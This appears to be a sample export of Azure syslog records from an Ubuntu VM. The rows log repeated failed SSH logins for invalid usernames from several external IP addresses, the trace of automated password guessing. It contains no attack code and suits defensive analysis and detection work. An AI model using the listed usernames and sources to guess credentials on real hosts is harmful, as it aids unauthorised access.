+18345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:56:24,UbuntuDevEnv,2019-06-26 09:56:23,auth,UbuntuDevEnv,info,Failed password for invalid user imperial from 187.6.249.142 port 53990 ssh2,77639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,imperial,187.6.249.1,53990,,
+18346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:56:24,UbuntuDevEnv,2019-06-26 09:56:23,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 53990:11: Bye Bye [preauth],77639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,53990,,
+18347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:56:24,UbuntuDevEnv,2019-06-26 09:56:23,auth,UbuntuDevEnv,info,Disconnected from invalid user imperial 187.6.249.142 port 53990 [preauth],77639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,imperial,187.6.249.1,53990,,
+18348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:57:03,UbuntuDevEnv,2019-06-26 09:57:02,auth,UbuntuDevEnv,info,Invalid user applmgr from 115.159.216.187 port 49222,77785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,115.159.216.1,49222,,
+18349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:57:03,UbuntuDevEnv,2019-06-26 09:57:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,77785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:57:03,UbuntuDevEnv,2019-06-26 09:57:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,77785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:57:05,UbuntuDevEnv,2019-06-26 09:57:04,auth,UbuntuDevEnv,info,Failed password for invalid user applmgr from 115.159.216.187 port 49222 ssh2,77785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,115.159.216.1,49222,,
+18352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:57:05,UbuntuDevEnv,2019-06-26 09:57:04,auth,UbuntuDevEnv,info,Disconnected from invalid user applmgr 115.159.216.187 port 49222 [preauth],77785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,applmgr,115.159.216.1,49222,,
+18353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:57:05,UbuntuDevEnv,2019-06-26 09:57:04,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 49222:11: Bye Bye [preauth],77785,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,49222,,
+18354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:58:15,UbuntuDevEnv,2019-06-26 09:58:14,auth,UbuntuDevEnv,info,Invalid user xi from 187.6.249.142 port 42656,78038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xi,187.6.249.1,42656,,
+18355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:58:15,UbuntuDevEnv,2019-06-26 09:58:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,78038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:58:15,UbuntuDevEnv,2019-06-26 09:58:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,78038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:58:17,UbuntuDevEnv,2019-06-26 09:58:17,auth,UbuntuDevEnv,info,Failed password for invalid user xi from 187.6.249.142 port 42656 ssh2,78038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xi,187.6.249.1,42656,,
+18358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:58:17,UbuntuDevEnv,2019-06-26 09:58:17,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 42656:11: Bye Bye [preauth],78038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,42656,,
+18359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:58:17,UbuntuDevEnv,2019-06-26 09:58:17,auth,UbuntuDevEnv,info,Disconnected from invalid user xi 187.6.249.142 port 42656 [preauth],78038,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xi,187.6.249.1,42656,,
+18360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:13,UbuntuDevEnv,2019-06-26 10:01:12,auth,UbuntuDevEnv,info,Invalid user aaron from 128.199.133.249 port 57565,78738,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,128.199.133.2,57565,,
+18361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:13,UbuntuDevEnv,2019-06-26 10:01:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,78738,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:13,UbuntuDevEnv,2019-06-26 10:01:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.133.249,78738,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,128.199.133.2,,0,
+18363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:15,UbuntuDevEnv,2019-06-26 10:01:14,auth,UbuntuDevEnv,info,Failed password for invalid user aaron from 128.199.133.249 port 57565 ssh2,78738,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,128.199.133.2,57565,,
+18364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:15,UbuntuDevEnv,2019-06-26 10:01:15,auth,UbuntuDevEnv,info,Disconnected from invalid user aaron 128.199.133.249 port 57565 [preauth],78738,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aaron,128.199.133.2,57565,,
+18365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:15,UbuntuDevEnv,2019-06-26 10:01:15,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.133.249 port 57565:11: Normal Shutdown, Thank you for playing [preauth]",78738,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.133.2,57565,,
+18366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:36,UbuntuDevEnv,2019-06-26 10:01:36,auth,UbuntuDevEnv,info,Invalid user xiu from 115.159.216.187 port 37217,78824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,115.159.216.1,37217,,
+18367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:36,UbuntuDevEnv,2019-06-26 10:01:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,78824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:36,UbuntuDevEnv,2019-06-26 10:01:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,78824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:38,UbuntuDevEnv,2019-06-26 10:01:38,auth,UbuntuDevEnv,info,Failed password for invalid user xiu from 115.159.216.187 port 37217 ssh2,78824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,115.159.216.1,37217,,
+18370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:38,UbuntuDevEnv,2019-06-26 10:01:38,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 37217:11: Bye Bye [preauth],78824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,37217,,
+18371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:01:38,UbuntuDevEnv,2019-06-26 10:01:38,auth,UbuntuDevEnv,info,Disconnected from invalid user xiu 115.159.216.187 port 37217 [preauth],78824,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,115.159.216.1,37217,,
+18372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:03:57,UbuntuDevEnv,2019-06-26 10:03:57,auth,UbuntuDevEnv,info,Invalid user guest2 from 115.159.216.187 port 45268,79316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest2,115.159.216.1,45268,,
+18373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:03:57,UbuntuDevEnv,2019-06-26 10:03:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,79316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:03:57,UbuntuDevEnv,2019-06-26 10:03:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,79316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:03:59,UbuntuDevEnv,2019-06-26 10:03:59,auth,UbuntuDevEnv,info,Failed password for invalid user guest2 from 115.159.216.187 port 45268 ssh2,79316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest2,115.159.216.1,45268,,
+18376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:04:00,UbuntuDevEnv,2019-06-26 10:03:59,auth,UbuntuDevEnv,info,Disconnected from invalid user guest2 115.159.216.187 port 45268 [preauth],79316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest2,115.159.216.1,45268,,
+18377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:04:00,UbuntuDevEnv,2019-06-26 10:03:59,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 45268:11: Bye Bye [preauth],79316,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,45268,,
+18378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:06:25,UbuntuDevEnv,2019-06-26 10:06:25,auth,UbuntuDevEnv,info,Connection closed by 115.159.216.187 port 53392 [preauth],79827,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,53392,,
+18379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:07:44,UbuntuDevEnv,2019-06-26 10:07:43,auth,UbuntuDevEnv,info,Invalid user student from 37.59.6.106 port 48446,80112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,37.59.6.1,48446,,
+18380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:07:44,UbuntuDevEnv,2019-06-26 10:07:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,80112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:07:44,UbuntuDevEnv,2019-06-26 10:07:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,80112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:07:46,UbuntuDevEnv,2019-06-26 10:07:45,auth,UbuntuDevEnv,info,Failed password for invalid user student from 37.59.6.106 port 48446 ssh2,80112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,37.59.6.1,48446,,
+18383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:07:46,UbuntuDevEnv,2019-06-26 10:07:45,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 48446:11: Bye Bye [preauth],80112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,48446,,
+18384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:07:46,UbuntuDevEnv,2019-06-26 10:07:45,auth,UbuntuDevEnv,info,Disconnected from invalid user student 37.59.6.106 port 48446 [preauth],80112,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,37.59.6.1,48446,,
+18385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:08:41,UbuntuDevEnv,2019-06-26 10:08:41,auth,UbuntuDevEnv,info,Invalid user db2 from 115.159.216.187 port 33146,80305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2,115.159.216.1,33146,,
+18386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:08:41,UbuntuDevEnv,2019-06-26 10:08:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,80305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:08:41,UbuntuDevEnv,2019-06-26 10:08:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,80305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:08:43,UbuntuDevEnv,2019-06-26 10:08:43,auth,UbuntuDevEnv,info,Failed password for invalid user db2 from 115.159.216.187 port 33146 ssh2,80305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2,115.159.216.1,33146,,
+18389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:08:44,UbuntuDevEnv,2019-06-26 10:08:43,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 33146:11: Bye Bye [preauth],80305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,33146,,
+18390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:08:44,UbuntuDevEnv,2019-06-26 10:08:43,auth,UbuntuDevEnv,info,Disconnected from invalid user db2 115.159.216.187 port 33146 [preauth],80305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,db2,115.159.216.1,33146,,
+18391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:09:28,UbuntuDevEnv,2019-06-26 10:09:27,auth,UbuntuDevEnv,info,Invalid user akim from 37.59.6.106 port 39850,80480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,akim,37.59.6.1,39850,,
+18392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:09:28,UbuntuDevEnv,2019-06-26 10:09:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,80480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:09:28,UbuntuDevEnv,2019-06-26 10:09:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,80480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:09:30,UbuntuDevEnv,2019-06-26 10:09:29,auth,UbuntuDevEnv,info,Failed password for invalid user akim from 37.59.6.106 port 39850 ssh2,80480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,akim,37.59.6.1,39850,,
+18395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:09:30,UbuntuDevEnv,2019-06-26 10:09:29,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 39850:11: Bye Bye [preauth],80480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,39850,,
+18396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:09:30,UbuntuDevEnv,2019-06-26 10:09:29,auth,UbuntuDevEnv,info,Disconnected from invalid user akim 37.59.6.106 port 39850 [preauth],80480,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,akim,37.59.6.1,39850,,
+18397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:10:52,UbuntuDevEnv,2019-06-26 10:10:51,auth,UbuntuDevEnv,info,Invalid user alec from 37.59.6.106 port 56758,80781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alec,37.59.6.1,56758,,
+18398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:10:52,UbuntuDevEnv,2019-06-26 10:10:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,80781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:10:52,UbuntuDevEnv,2019-06-26 10:10:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,80781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:10:54,UbuntuDevEnv,2019-06-26 10:10:54,auth,UbuntuDevEnv,info,Failed password for invalid user alec from 37.59.6.106 port 56758 ssh2,80781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alec,37.59.6.1,56758,,
+18401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:10:54,UbuntuDevEnv,2019-06-26 10:10:54,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 56758:11: Bye Bye [preauth],80781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,56758,,
+18402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:10:54,UbuntuDevEnv,2019-06-26 10:10:54,auth,UbuntuDevEnv,info,Disconnected from invalid user alec 37.59.6.106 port 56758 [preauth],80781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alec,37.59.6.1,56758,,
+18403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:11:11,UbuntuDevEnv,2019-06-26 10:11:11,auth,UbuntuDevEnv,info,Invalid user vps from 128.199.242.84 port 39032,80816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,128.199.242.8,39032,,
+18404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:11:11,UbuntuDevEnv,2019-06-26 10:11:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=128.199.242.84,80816,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,128.199.242.8,,0,
